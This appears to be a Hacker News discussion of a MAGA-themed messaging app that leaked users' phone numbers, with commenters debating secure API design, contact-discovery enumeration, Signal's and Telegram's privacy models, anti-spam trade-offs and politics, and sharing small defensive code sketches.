This might be the fault of an opt-out serialization library (by default it serializes the whole object, and you have to manually opt fields out). So a programmer adds a field, forgets the opt-out annotation, and voilà.
Or they are just using plain JS dicts on the server and forgot to remove the key before using it in a response.
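A sketch of that failure mode in Python (the `User` type and field names are hypothetical; the point is that an explicit allow-list fails closed when someone adds a new field, while "serialize everything" fails open):

```python
from dataclasses import dataclass, asdict
import json

@dataclass
class User:
    username: str
    phone_number: str  # sensitive: must never appear in an API response

# Allow-list: a newly added field is NOT exposed until someone opts it in.
PUBLIC_FIELDS = {"username"}

def to_response(user: User) -> str:
    # Safe: serialize only the explicitly allowed fields.
    data = {k: v for k, v in asdict(user).items() if k in PUBLIC_FIELDS}
    return json.dumps(data)

user = User("alice", "+15551234567")
print(json.dumps(asdict(user)))  # naive "serialize everything": leaks the number
print(to_response(user))         # {"username": "alice"}
```

The opt-out design inverts this: forgetting one annotation silently widens the API response.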
> The vulnerability they’re talking about was presented in a paper by researchers at the University of Vienna.
This vulnerability (mapping phone numbers to user IDs via the rendezvous API) is old: it was exploited in Telegram in 2016 [1] and allowed the Iranian government to build a phone book of 15M Telegram users. The paper also mentions that the vulnerability was known in 2012 and still not fixed.
Obviously, rate limiting is a separate and important issue in API management.
The thing about building secure systems is that there are a lot of edges to cover.
It may not be pertinent to the subject, but clearly I have found a kindred spirit in this author.
Have they?
A sentence clipped from a point a little past the introduction, but catchy nevertheless.
I suspect there will be more than "tens of readers" shortly.
Is this an actual quote? Because it sounds like a standup joke.
I’m glad I have never heard of this app.
Security and trust go hand in hand.
I'd only have 20 cents, which I guess is good. But I'm sure there's more I'm forgetting.
Related:
[1] https://news.ycombinator.com/item?id=44684373
The real lesson: assume every service will eventually leak something. Use unique passwords everywhere, enable 2FA, and rotate credentials after breaches.
The tedious part is the rotation. I've seen people skip it because manually changing 50+ passwords is brutal. Automation helps but needs to be done securely (local-only, zero-knowledge).
The website doesn't really spark any confidence.
Never heard of it and I'd be surprised if they have more than 100 users.
Never heard of the wrench technique? It's always gonna work out great. Way cheaper and easier than "wizardy" too.
but after having seen IRL people accidentally overlooking very basic things, I have come (over the past few years) to think using them is essential, even though they often suck (1).
(1): Due to false positives, wrong severity classifications, wrong reasoning for why something is a problem, and in general not doing anything application-specific, etc.
I mean, who would be so dumb as to accidentally expose some RCE-prone internal testing helper, only used for local integration tests, on their local network? (Turns out: anyone who uses docker/docker-compose with a port mapping that doesn't explicitly define the interface, i.e. anyone following 99% of docker tutorials...) Or there's no way you'd forget to set content security policies; I mean, it's a ticket in the initial project setup, or already done in the project template (but then a careless git conflict resolution removed them). Etc.
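For the docker-compose case, the difference is one prefix in the port mapping (service name hypothetical):

```yaml
services:
  test-helper:                   # hypothetical internal-only service
    image: internal/test-helper
    ports:
      - "8080:8080"              # binds 0.0.0.0: reachable from the whole local network
      # - "127.0.0.1:8080:8080"  # loopback-only: what the tutorials should show
```

Without the explicit interface, Docker also inserts iptables rules that can bypass the host firewall, so the service is exposed even if you think a firewall covers you.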
In a previous job, on my first audit of the code, I spotted such vulnerabilities pretty much everywhere.
Developers simply need to stop using these libraries.
I keep seeing people try to explain away incompetence by blaming unaccountable things, i.e. the tool or the system. Exposed password? Must be the library; people really should stop using it. No, the library is not wrong; people should be better developers.
Peer reviewed paper is full of AI slop, must not be the reviewer’s fault, the citations were there, they were just fake. What is going on?
"Hey, _we_ don't store your contacts, we are good! Instead you have to manage them yourself, and in process share your presumably "secure" Signal contact list with Apple, Google, Facebook phone carriers and everyone else. But it's not on our servers, so we don't care"
That said, the analysis itself is interesting and worth a look, if nothing else it's a general pattern you can follow for many chat applications to see how secure it is.
> Neither of us had prior experience developing mobile apps, but we thought, “Hey, we’re both smart. This shouldn’t be too difficult.”
I think, 40 years from now when we're writing about this last decade or so of software development, this quote is going to sum it all up.
looks at Signal
Oh.
Original title is: “Super secure” MAGA-themed messaging app leaks everyone’s phone number
I think that's incredibly important context. Instead of conferring with actual experts in the field, the populist, fascist segment of our society just decided to wing it with technology.
They BELIEVED they were more secure, with no evidence to back it up.
I don’t take any offense, but I do have high standards for this forum, and cringe comments make me less likely to hang out here.
He makes it sound like he's on some sort of mission... like the users of the messaging app (which I had never heard of before today) should face some sort of backlash for political views opposite his own... which is amusing to say the least, as Canadians seem to have permanently branded conservatives, not just in their own country but all over the world, as "MAGA".
Also, I'd appreciate it if we could keep politics out of this; it just detracts focus from the technical end of things.
Lots of things are really simple. But you have to know about them first.
"Yeah but it wasn't in the docker tutorial I skimmed so I have no idea what it means."
While slightly unrelated, I thought about how we could fix this for truly secure, privacy-aware, non-commercial communication platforms like Matrix: make it impossible to build such a mapping. The core idea is that you should be able to find a user by number only if you are in their contact list; strangers not welcome. So every user who wishes to be discovered uploads hash(A, B) for every contact: a hash of the user's phone number (A) and the contact's phone number (B), swapped if B < A. Let's say user A uploaded hashes h(A,B) and h(A,C). Now user B wishes to discover contacts and uploads hashes h(A,B) and h(B,D). The server sees the matching hash between A and B and lets them discover each other without knowing their numbers.
The advantages:
- as we hash a pair of 9-digit numbers, the hash function domain space is larger and it is more difficult to reverse the hashes (hash of a single phone number is reversed easily)
- each user can decide who may discover them
Disadvantages:
- a patient attacker can create hashes of A with all existing numbers and discover who A's contacts are. Basically, extract anyone's phone book via the discovery API. One way to protect against this would be to verify A's phone number before allowing discovery, but the government can probably intercept SMS codes and pass the verification anyway. Then again, the government can also see all the phone calls, so they know who is in whose phone book anyway.
- if the hash is reversed, you get pairs of phone numbers instead of just one number
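A minimal sketch of the pair-hash matching described above (phone numbers are made up, and a plain SHA-256 stands in for whatever a real deployment would use; in practice you'd want a slow or keyed hash to make reversal harder):

```python
import hashlib

def pair_hash(a: str, b: str) -> str:
    """Hash of two phone numbers, order-normalized so both sides compute the same value."""
    lo, hi = sorted((a, b))
    return hashlib.sha256(f"{lo}|{hi}".encode()).hexdigest()

# User A uploads hashes for their contacts B and C.
uploaded = {pair_hash("555000111", "555000222"),   # h(A, B)
            pair_hash("555000111", "555000333")}   # h(A, C)

# User B queries with hashes for their own contacts A and D.
# Note h(B, A) == h(A, B) thanks to the order normalization.
query = {pair_hash("555000222", "555000111"),      # h(B, A)
         pair_hash("555000222", "555000444")}      # h(B, D)

# The server intersects the sets without learning the numbers themselves.
matches = uploaded & query
print(len(matches))  # 1 -- A and B may discover each other; D stays invisible
```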
Do you have further reading on this?
The fact that we consistently have data breaches in institutions we trust is converging to a point where it's literally just a data-harvesting op and everybody stops caring. They won't even bother to join class-action lawsuits anymore, because the rewards enrich the lawyers while everybody gets their twenty bucks in the mail after providing more personal data to the law firm. It's like a loophole.
we now have legalized insider trading in the form of "prediction markets", legalized money laundering and pump and dump through crypto, all of these always lead to failures for the participant disguised as wins.
It looks like "Freedom" is a sure thing.
* github.com/maqp/tfc
There's a general zeitgeist of "Experts don't know what they're talking about" that has fed both pieces of this space. It's an Age of Doubt, as it were, but the hubristic kind of doubt, not the questing kind.
But for a commercial messaging app you expect better...
Well, obviously we can't be seen as non-neutral (I wish I were joking, but I have a feeling that is the thought process on a good day)
Great example of how perception and reality can differ vastly
It’s a compromise meant to propagate the network, and it has a high degree of utility to most users. There are also plenty of apps that are de-facto anonymous and private. Signal is de facto non-anonymous but private, though using a personally identifiable token is not a hard requirement and is trivial to avoid. (A phone number of some kind is needed once for registration only)
That… is not a real degree.
>"Now, anyone who has read Mindset by Carol Dweck, Grit by Angela Duckworth, or The Brain That Changes Itself by Norman Doidge, M.D., knows that you can be, do, and have whatever you want."
The gap between "read" and "understood" swallows so many. Also, did he use TR's "Man in the Arena" quotation? Reader, of course he did.
"ChatGPT, write an essay about software development during the smartphone social networking boom. Find a good quote to sum it all up."
The turning point was smartphones. No, they don't clandestinely listen to the audio, or smuggle tower locations of unimportant people. But (all of our) behavior changes when we rely on an app and give up those other liberties because app. Some social engineering was required for mass adoption thereof, and most of us here are acquainted with the analytical means to concentrate delivering that. Half of our society has weaknesses that we euphemize as "gaming habits" or "addictive personalities". Maybe they know it; I'm not down here haughtily scoffing that they cannot know it.
China and Russia and North Korea don't show those weaknesses because those people are down in the mines. The powers learned social engineering within their closed societies, not in our open societies. They promote a nation and a people unified with one personality. The United States and similar freedom exponents have to contend with attracting the world's talent by explicitly tolerating any personality. At least for now
This is an app specifically built for a specific political group, a group that is wreaking havoc on our science and technology. "MAGA" has become the go-to term for a global movement, because there is a global alt-right movement to undo progress and dominate others into their world view.
It's going to be a part of HN like it was the first go around. Being apolitical is how political groups like this come to power.
Meanwhile, Matrix for now does support hashed contact lookup, although few clients implement it given the privacy considerations at https://spec.matrix.org/unstable/identity-service-api/#secur...
The data Signal has is: 1) registration time for a given phone number, 2) knowledge of daily login (24hr resolution). That's it. That's the metadata.
They do not have information on who is communicating with who, when messages are sent, if messages are sent, how many, the size, or any of that. Importantly, they do not have an identity (your name) associated with the account nor does that show for contacts (not even the phone number needs be shared).
Signal is designed to be safe from Signal itself.
Yes, it sucks that there is the phone number connected to the account, but you can probably understand that there's a reason authorities don't frequently send Signal data requests; because the information isn't very useful. So even if you have a phone number associated with a government ID (not required in America) they really can only show that you have an account and potentially that the account is active.
Like the sibling comment says, there's always a trade-off. You can't have a system that has no metadata, but you can have one that minimizes it. Signal needs to balance usability and minimize bots while maximizing privacy and security. Phone numbers are a barrier to entry for bots, preventing unlimited or trivial account generation. It has downsides but upsides too. One big upside is that if Signal gets compromised, there can be no reconstruction of the chat history or metadata. IMO, it's a good enough solution for 99.9% of people. If you need privacy and security from nation-state actors who are directly targeting you, then it's maybe not the best solution (at least not out of the box), but otherwise I can't see a situation where it is a problem.
FWIW, Signal does look to be moving away from phone numbers. They have usernames now. I'd expect it to take time to completely get away though considering they're a small team and need to move from the existing infrastructure to that new one. It's definitely not an easy task (and I think people frequently underestimate the difficulty of security, as quoted in the article lol. And as suggested by the op: it's all edge cases)
My Signal number is a Google Voice number that has nothing to do with any mobile phone. The Google account has advanced protection turned on so you can’t port it or get the SMSes without a hardware login token.
Simplex was a decent option but they're going down the crypto rabbit hole and their project lead is...not someone who should be trusted by anyone in the crosshairs right now.
Phreeli [https://www.phreeli.com/] allows you to get a cell number with just a zip code. They use ZKP (Zero Knowledge Proofs) for payment tracking.
Should have deleted my account instead of just removing the app, because it turns out the difference between using signal and using SMS is obscured for most phones, and when people thought they were texting me they weren't. I was just out of contact for a long time as people kept sending me the wrong kind of messages. I suppose one could argue protecting contact/identity is not a real goal for e2e encryption, but what I see is a "privacy oriented" service that's clearly way too interested in bootstrapping a user base with network effects and shouldn't be trusted.
Also, the average Joe is not using a proxy to hide the IP address of their device, so they leak their identity to the server anyway. Signal not keeping those logs helps.
Messaging apps cater to different needs, sometimes you need only content-privacy. It's not a secret you're married to your partner and you talk daily, but the topics of the conversation aren't public information.
When you need to hide who you are and who you talk to (say Russian dissident group, or sexual minorities in fundamentalist countries), you might want to use Tor-exclusive messaging tools like Cwtch. But that comes at a near-unavoidable issue of no offline-messaging, meaning you'll have to have a schedule when to meet online.
Signal's centralized architecture has upsides and downsides, but what matters ultimately is, (a) are you doing what you can in the architectural limitations of the platform (strong privacy-by-design provides more features at same security level), and (b), are you communicating the threat model to the users so they can make informed decision whether the applications fits their threat model.
We know from subpoenas that signal only holds the user phone number, creation timestamp, and last login timestamp. That’s it.
Signal provides content-privacy by design with E2EE. Signal provide metadata-privacy by policy, i.e. they choose to not collect data or mine information from it. If you need metadata-privacy by design, you're better off with purpose-built tools like Cwtch, Ricochet Refresh, OnionShare, or perhaps Briar.
To cut it short, they use Intel SGX to create a "trusted environment" (trusted by the app/user) in which they run the contact discovery.
In that trusted environment you then run algorithms similar to other messengers (i.e. you still need to rate limit them as it's possible to iterate _all_ phone numbers which exist).
If working as intended, this is better than what alternatives provide, as it protects phone numbers not just from 3rd parties but also from the data-center operator and, to some degree, even from Signal itself.
But it's not perfect. You can use side channel attacks against Intel SGX and Signal most likely can sneak in ways for them to access things by changing the code, sure people might find this but it's still viable.
In the end, what matters is driving up the cost of attacks to the point where they aren't worth it, either not worth it in general or because there are easier attack vectors (e.g. against your phone) that also give the attacker what they want. Either way, the system should no longer be suited for systematic mass surveillance of everyone, or even just of subgroups like politicians, journalists and the like.
It's not laziness. It's populism rejecting what they consider elitism, which includes expertise and experience.
But the way it's phrased and worded... at best, it's the kind of really bad typo that shows rank incompetence; at worst, it's outright fabrication that is actively lying about the credentials; and what I think most likely, it's obfuscation that's relying on credentialism to impart an imprimatur of credibility that is wholly undeserved (i.e. "I got an unrelated degree at Stanford, but it's Stanford and how could anyone who goes there be bad at CS?").
Especially just being able to run my own service will be priceless when something like chatcontrol eventually makes it through. Signal can only comply or leave, but they'll never manage to kill all the matrix servers around.
There should never be a need to return a pin to the client. You’ve already texted/emailed it to them. They are going to send it back to you. You will check against your temporary storage, verify/reject, and delete it immediately after.
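A minimal sketch of that flow (the in-memory store and names are hypothetical; a real service would use an expiring store like Redis and rate-limit attempts):

```python
import secrets
import time

# Hypothetical in-memory store: user_id -> (pin, expiry timestamp).
_pending: dict[str, tuple[str, float]] = {}

def issue_pin(user_id: str) -> str:
    pin = f"{secrets.randbelow(1_000_000):06d}"
    _pending[user_id] = (pin, time.time() + 300)  # 5-minute validity window
    return pin  # deliver via SMS/email only; never echo it in the API response

def verify_pin(user_id: str, submitted: str) -> bool:
    entry = _pending.pop(user_id, None)  # delete immediately, pass or fail
    if entry is None:
        return False
    pin, expiry = entry
    # Constant-time comparison avoids leaking digits via timing.
    return time.time() < expiry and secrets.compare_digest(pin, submitted)

pin = issue_pin("alice")
print(verify_pin("alice", pin))  # True
print(verify_pin("alice", pin))  # False: the PIN is single-use
```

Because the server only ever stores and compares, nothing sensitive needs to travel back to the client.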
Seems like it was working as designed, if you don't want any app to get your contact info don't share your contact info to anyone ever. Eventually they will share that info with any app.
Now that this crucial adoption feature has been removed, it makes zero sense for Signal to continue to rely on phone numbers. Since that feature has been removed, the utility of Signal has been lost anyway and many in my groups returned to regular SMS. So the system is already compromised from that perspective. At least forks such as Session tried to solve this (too bad Session removed forward secrecy and became useless)
Also, Telegram is not private.
1. It's not E2EE by default
2. It's not E2EE for groups on any platform
3. It's not E2EE 1:1 on desktop clients forcing you to downgrade from secret chats to insecure chats
4. It's collecting 100% of your metadata, including
* who you talk to, when, how much, what type of data you exchange,
* your IP-address which sort of defeats the purpose of having no phone number, and
* when you enable secret chats
Telegram is also not transparent about its funding, about who develops it, and who has access to the plaintexts stored on their server (meaning, anyone with a zero day or two).
Journalists who went looking for Telegram's office in Dubai found that no one in the neighboring offices had ever seen Telegram staff enter the space: https://www.youtube.com/watch?v=Pg8mWJUM7x4
Telegram was built with blood money from VKontakte, and Durov has been marketed as living in exile, when in reality he has visited Russia on average once every 2.4 months since the exile began. Strangely, Durov has not had his underwear poisoned, and windows have been kind to him, despite his supposedly betraying Putin's interests.
tl;dr Telegram reeks of FSB/SVR honeypot.
If you reject the best and only easy option from the outset because you don’t want actual healthcare, then yeah… whatever remains is going to be “hard”.
What the US has right now is a complex entrenched system of financial middlemen that refuse to abandon their rent seeking. They provide only(!) financial “services” and will fight actual healthcare tooth and nail.
Trump wasn’t strong enough — or simply didn’t care enough — to fight these people.
Ultimately, you're just buying time, generating tamper evidence in the moment, and putting a price-tag on what it takes to break in. There's no "perfectly secure", only "good enough" to the tune of "too much trouble to bother for X payout."
(I would be thrilled to learn that this changed, but it has been in place for many years and it's kinda hard to personally test)
What's wrong with account generation? Nothing. The problem is if they start sending spam to random people. So we can make registration or adding contacts paid (in cryptocurrency) and the problem is gone.
> Does Signal protect from the scheme when the government sends discovery requests for all existing phone numbers (< 1B) and gets a full mapping between user id and phone number?
Signal does have the phone numbers, as you say. Can they connect a number to a username?
Those people already had your contact info, probably.
Also, I think there is a setting in Signal to prevent that - and via the OS you can block Signal's access to your contacts, of course.
That Signal did none of those things implies that privacy was not their objective. Only secure communications was.
It's possible that the reason behind their anti-privacy stand is strategic, to discourage criminal use which could be used as a vector of attack against them. Doesn't change the fact that Signal is demonstrably anti-privacy by design.
I asked because both political parties have chapters at national, regional, state & local levels so "GOP job board" on the face wasn't clear which organization was running it. Some parties cover rural counties of just a few thousand people.
I was aware of all this before, but the experience has tainted my opinion even further of higher education. Graduates of the for-profit tech school are likely to face professional discrimination, while students from the more prestigious university will receive interviews and opportunities because of a name listed on their resume.
Signal is just much smaller in terms of users so the potential value is lower.
>Telegram reeks of FSB/SVR honeypot
Btw interesting connection between Durov/TON and Jan Marsalek (alleged Russian spy) was recently uncovered by FT:
>In 2018 Marsalek invited Ben Halim and other backers of the Libya projects to invest in a new crypto token being launched by messaging platform Telegram, whose founder Pavel Durov had met Marsalek and invited him to participate.
>A special purpose vehicle was set up for them to pool their money and invest but Credit Suisse, which was organising the sale of the token, blocked the transaction. It turned out the bank was happy to take money from Marsalek, whose role in the biggest corporate fraud in recent European history had yet to be revealed, but was wary of his Libyan friends.
>As a workaround, Ben Halim and others decided to let Marsalek invest their money in his name, sidestepping Credit Suisse’s money laundering checks. However, the US Securities and Exchange Commission blocked Telegram’s issuance of the tokens and Marsalek refunded his Libyan associates.
- verify the attestation
- make sure it means the code they have published is the attested code
- make sure the published code does what it should
- and catch any divergence to this *fast enough* to not cause much damage
....
it's without question better than doing nothing,
but it's fundamentally not a perfect solution.
Then again, it's very unclear whether a perfect solution even exists; I would guess that, due to the characteristics of phone numbers, there isn't one.
https://play.google.com/store/apps/details?id=com.freedomcha...
I think Telegram is filth as much as the next guy, but I'm just making that technical point.
They are likely a bit of both, increasingly more so going forward.
- some checks are straightforward and it would be dumb to use AI for them
- some checks require AI
What's right with it? Accounts being generated (i.e. many inauthentic accounts controlled by few people) are always used to send spam, there are no exceptions. The perpetrators should be in prison.
discoverability does default to "on", but there is an opportunity to disable it during registration, which prevents those notifications.
> What's wrong with account generation?
Your comment *literally* explains one issue...

> That doesn't answer the GP question:

It does. They asked

>>> Does Signal protect from the scheme when the government sends discovery requests for all existing phone numbers (< 1B) and gets a full mapping between user id and phone number?

Which yes, this does protect against. There is no mapping between a user ID and a phone number. Go look at the reports: they only show that a phone number has a registered account, but they do not show what the user ID is. Signal doesn't have that information to give.

> Can they connect a number to a username?

From Signal:

> Usernames in Signal are protected using a custom Ristretto 25519 hashing algorithm and zero-knowledge proofs. Signal can’t easily see or produce the username if given the phone number of a Signal account. Note that if provided with the plaintext of a username known to be in use, Signal can connect that username to the Signal account that the username is currently associated with. However, once a username has been changed or deleted, it can no longer be associated with a Signal account.

This is in the details on [0], right above the section "Set it, share it, change it". So Signal cannot use phone numbers to identify usernames, BUT Signal can use usernames to identify phone numbers IF AND ONLY IF that username is in active use. (Note that the username is not the Signal ID.)
If you are worried about this issue, I'd either disable usernames or rotate them continually. If the username is not connected to your account at the time the request is made, then no connection can be made by Signal. So this is pretty easy to thwart, though I wish Signal included a way to automate it (perhaps Molly has a way, or someone could add it?). Either rotating after every use or on a timer would almost guarantee this, given that it takes time to get a search warrant and time for Signal to process it. You can see from the BigBrother link that Signal is not very quick to respond...
1. were unable to communicate effectively, or
2. used no security at all.
Do you really use a communication system where you have all exchanged private keys in person and where even the fact that you use it is hidden from your government and phone operator?
Not even. If you actually try, you will discover at the last step (after full KYC, signing some dubious agreements, and linking an existing TG account) that the Fragment "market" is actually fully centralized and has not been open to new buyer-users for a good while. No secondary markets out there (maybe not even possible on their network), afaik.
They want us to _not talk_ about what they are doing, so we _remain ignorant_ of what each other think about what they are doing, so they can get away with more
Definitely, because I never said they weren’t and certainly don’t believe that — I know too many smart conservatives for that. That’s a big part of the problem: smart people can put a lot of effort into constructing rationalizations so when they’re immersed in a culture where political correctness trumps objectivity they’ll construct elaborate narratives to support the ideologically useful outcome.
The relevance to security is that these people are more vulnerable because they can’t tell charlatans who appear to be on their side apart from people who actually know what they’re talking about. There are tons of right-leaning people in tech but as we saw with election fraud claims, the competent ones know it’s risky to contradict the narrative and stay quiet rather than being accused of being RINOs. It’s similar to how things like MLM scams spread in religious communities if you have experience with that, where things usually have to get pretty bad before someone is willing to criticize a friendly member of their congregation.
The majority of the user base would be gone, too.
I had a hard enough time convincing my friend group to use Signal as is. If they had to pay (especially if it had to be via cryptocurrency) none of them would have ever even considered it.
The CEO vanished from the discussion (again) so my proposals to improve ease of use of Tor never reached them. You can catch up on the discussion at https://discuss.privacyguides.net/t/simplex-vs-cwtch-who-is-...
It's not hard to do so, so if they're having difficulty doing that, what other simple things are they having difficulty with? Why would anyone hinge their safety and well being on the whims of such a person?
I say this as a person who bought into the initial concept, and who has used it myself.
What leaked was that I was a signal user, and that the person on the other side was a signal user. The security implications are obvious, and by itself, that's already enough to get someone who really needs to care about privacy killed.
> Also, I think there is a setting in Signal to prevent that
False. It happened without my permission as soon as the app was installed, and there was no way to opt out. Maybe they changed it since then, but the fact remains they obviously cared more about network-effects and user-counts than user privacy.
Sigh, there's just no need for this kind of apologism. You could just admit that a) it's bad behavior, b) they did it on purpose, and c) it's not possible to trust someone who does something like this. I'm aware they are nonprofit, so I don't know why it's like this, but the answer is probably somewhere in the list of donors.
> privacy was not their objective. Only secure communications was.
> Signal is demonstrably anti-privacy by design.
But your second is uncharitable and misses Signal's historical context.
The value of a phone number for spam prevention has been mentioned, but that's not the original reason why phone numbers were central to Signal. People forget that Signal was initially designed around using SMS as transport, as with Twitter.
Signal began as an SMS client for Android that transparently applied encryption on top of SMS messages when communicating with other Signal users. They added servers and IP backhaul as it grew. Then it got an iOS app, where 3rd party SMS clients aren't allowed. The two clients coexisted awkwardly for years, with Signal iOS as a pure modern messenger and Signal Android as a hybrid SMS client. Finally they ripped out SMS support. Still later they added usernames and communicating without exposing phone numbers to the other party.
You can reasonably disdain still having to expose a phone number to Signal, but calling it "anti-privacy by design" elides the origins of that design. It took a lot of refactoring to get out from under the initial design, just like Twitter in transcending the 140-character limit.
I think we've all been the one who got fooled in some relationship. Maybe for you it wasn't a political party. But I bet it still hurt.
Perfect privacy would mean not sending any messages at all, because you can never prove the message is going to the intended recipient. Any actual system is going to have tradeoffs, calling Signal anti-privacy is not serious, especially when you're suggesting cryptocurrency as a solution.
A ZKP system where you make a public record of your zero-knowledge proof sounds anti-privacy to me. Even if you're using something obfuscated like Monero, it's still public. I see where you're coming from, but I think I would prefer Signal just keep a database of all their users and promise to try and keep it safe rather than rely on something like Monero.
So who's doing the computation? The spammer can't afford to run a 3-second key derivation per spam device? Or how long do you think a normal user will wait while you burn their battery before saying "Screw it, I'll just use WA"? Or is this something the server should be doing?
>Captcha
LLMs are getting quite good at getting around captchas.
>invite-code system
That works in lobste.rs when everyone can talk together, and recruit interesting people to join the public conversation. Try doing that with limited invites to recruit your peers to build a useful local network of peers and relatives. "I'm sorry Adam, I'm out of invites can you invite my mom's step-cousin, my mom needs to talk to them?"
>Signal's architects already knew that when they started designing it.
I think they really did, and they did what the industry had already established as the best practice for a hard problem.
The only reasonable alternative would've been email with heavy temp-mail hardening, or looking into the opposite end of Zooko's triangle and having long, random, hard-to-enumerate usernames like Cwtch and other Tor-based messengers do. But even that doesn't remove the spam-list problem of any publicly listed address ending up on a list that gets hit with spam contact requests or opening messages.
I thought the general belief (e.g., '“Proof-of-Work” Proves Not to Work') was that proof-of-work isn't very good anti-spam.
> or a Captcha
Aren't bots better at those than humans by now?
And making people do captchas in an instant messenger is a great way to make people not use that instant messenger.
> or an invite-code system like lobste.rs or early Gmail.
That's not a long-term option if you want to make something mainstream.
For every example of Maga group think, I can think of an example of Obamaphile group think.
And if the contrarian / doubtful end of the spectrum ( all elites are nefarious) is bad, doesn't that imply that the gullible / trusting end of the spectrum (all elites & academics are benevolent) is also bad?
The roles are just a mirror of each other. You're just picking sides -- which is how things usually operate.
Probably because it has always been trivial to proxy Tor with its built-in and supported SOCKS5.
Clearly, either this was before Signal had its username-lookup-only feature, or you opted into letting people find you by your phone number. At that point, the information is already effectively leaked in the same way (it’s easy for anyone to enumerate all phone numbers, let alone for you to enumerate your own contacts or vice versa), and if the notification surprised you then the absence of the notification would simply have been giving you a false sense of security.
Communication by non-phone-number identifiers is critically important, and I’m glad for recent Signal developments in that direction and hopeful for more in the future, but opting into phone-number-based communication and complaining that your contacts were merely notified about the communication option they would have been able to access anyway on a security or privacy basis is silly. The fact that this information (your contacts) passes through Signal is much more objectionable to me, even though they do the SGX thing, and I would never recommend allowing it access to your contacts for that reason.
I liked the SimpleX concept, but would prefer its relay server were replaced by Tor or i2p network.
And if they used Signal instead of NIH protocol.
Actually, the only unique SimpleX feature I really like is that it uses separate ids for every connection and group.
I understand the unease about the notifications, but there are some hard tradeoffs between how you can store as little information as possible, remain as decentralized as possible, while getting the same benefits as centralized systems like Facebook.
I'm really of the opinion that a messenger similar to Signal but more centralized in the fashion of WhatsApp or even Facebook Messenger should exist, but I also understand why Signal works the way it does.
I have yet to see any of that while just using the app. Do you think people owning a project should not be allowed to have and share their opinions about anything but the project?
> You can reasonably disdain still having to expose a phone number to Signal, but calling it "anti-privacy by design" elides the origins of that design.
They introduced usernames without removing the requirement for phone numbers.
I rest my case.
You never questioned whether it was a real service. When confronted, you pretend it doesn't matter that it's a security lapse in a tiny no-name project.
Groups in messaging apps rarely contain more than 100 users. So invite codes can work well for messaging apps.
You want constant ideological battles to end, and the answer is... do nothing?
They have the megaphone. If you want to take it away, we have to talk to each other about it so they start marginalizing their posts and opinions. MAGA is the poster child for the Overton shift, it's not going back any amount without effort
If it consistently happens more often for any given political faction, then it's still not an ideological statement, just a realization that not every political direction has an equal commitment to facts and reality.
So, mostly, I'd like the alt-stupids to not take over.
They have exactly that. They rely on TPMs for "privacy" which is not serious.
> Perfect privacy would mean not sending any messages at all
Not sending messages is incompatible with secure messaging which is the subject of the discussion...
> ZKP system where you make a public record of your zero-knowledge proof sounds anti-privacy to me.
A zero-knowledge proof provably contains zero information. Even if you use a type of ZKP vulnerable to a potential CRQC it's still zero information and can never be cracked to reveal information (a CRQC could forge proofs however).
> especially when you're suggesting cryptocurrency as a solution
Would you elaborate on why cryptocurrencies are not a solution? Especially if combined with ZKPs to sever the connection between the payment and the account. When combined with ZKPs, they could even accept Paypal for donations in exchange for private accounts.
The user's device has to do the computation for it to be effective. How long does it normally take to sign up for a new messaging service like WhatsApp? Five minutes? You should burn the user's cellphone battery for about half that long, 150 seconds, 50 times more than you were thinking. Plus another half-minute every time you add a new contact. Times two for every time someone blocks you, up to a limit of 150 seconds. Minus one second for each day you've been signed up. Or something like that.
The value of signing up for Signal is much higher to a real user than it is to a spammer, so you just have to put the signup cost somewhere in the wide range in between.
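Concretely, the kind of sliding client cost being described can be sketched as hashcash-style proof-of-work. This is an illustrative sketch, not anything Signal actually uses, and the difficulty numbers are made up:

```python
import hashlib
import os

def solve_pow(challenge: bytes, difficulty_bits: int) -> int:
    """Find a nonce such that SHA-256(challenge || nonce) starts with
    `difficulty_bits` zero bits. Expected work: ~2**difficulty_bits hashes."""
    target = 1 << (256 - difficulty_bits)
    nonce = 0
    while True:
        digest = hashlib.sha256(challenge + nonce.to_bytes(8, "big")).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce
        nonce += 1

def verify_pow(challenge: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Server-side check: a single hash, regardless of difficulty."""
    digest = hashlib.sha256(challenge + nonce.to_bytes(8, "big")).digest()
    return int.from_bytes(digest, "big") < (1 << (256 - difficulty_bits))

challenge = os.urandom(16)
nonce = solve_pow(challenge, 16)  # ~65k hashes, well under a second in Python
assert verify_pow(challenge, nonce, 16)
```

Scaling `difficulty_bits` up and down per event (signup, new contact, blocks) is how you'd implement the sliding cost schedule above; in practice a memory-hard function like Argon2 narrows the phone-versus-GPU-rig gap far better than plain SHA-256.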
LLMs didn't exist when Signal was designed, and Captchas still seem to be getting a lot of use today.
Invite codes worked fine for Gmail, and would work even better for any kind of closed messaging system like Signal; people who don't know any users of a particular messaging system almost never try to use it. The diameter of the world's social graph is maybe ten or twelve, so invite codes can cover the world's social graph with only small, transitory "out of invites" problems.
The "industry" had "established" that they "should" gather as much PII as possible in order to sell ads and get investments from In-Q-Tel.
Bots may be better than humans at Captchas now, although I'm not certain of that, but they certainly weren't when Signal was designed.
I don't see why invite codes would be a problem for mainstream use.
Signal mostly.
>separate ids for every connection and group
The thing is, there's Akamai and Runonflux, two companies hosting the entire public SimpleX infrastructure. If you're not using Tor and SimpleX Onion Services with your buddies, these two companies can perform end-to-end correlation attacks to spy on which IPs are conversing, and TelCos know which IPs belong to which customers at any given time. Mandatory data retention laws about the assigned IPs aren't rare.
Most people would not, though, and that's the issue.
Yeah, no. The whole "every perspective has some validity" thing doesn't really apply to most safety/security issues. The most charitable thing to say here is that the workflow is completely broken. Less charitable but also valid is pointing out that it's actively harmful, and deliberate. I would be really surprised if this hadn't ever caused serious consequences, whether a whistleblower was fired, an abused spouse was further abused, or an informant was killed. If you think you've got a "valid perspective" that prioritizes mere user discovery over user safety, then you should not be attempting work that's close to safety and security, full stop.
Back in 2004, sure. Today, Gmail asks you for a phone number when signing up because of the spam problem.
If you actually do that you're going to crash a lot of cellphones and people will rightly blame your app for being badly coded.
Yeah, what could I possibly know about secure messaging.
>Plus another half-minute every time you add a new contact.
Can you point to an instant messaging app that makes you wait 30 seconds before talking to someone? How niche is that?
If you want proper uptake and accessibility for everyone, you need something like a Samsung A16 to be able to finish the work in 150 seconds. A non-amateur spammer throws ten RTX 5090s at unlocking random accounts at 80x parallelism (capped by memory cost) and finishes the same work in far less than 150 seconds: 121.5 GFLOPS vs 10x104.8 TFLOPS is an overall performance difference of roughly 8,800x. And each account is then free to spam at a decent pace for a long time before it gets flagged and removed.
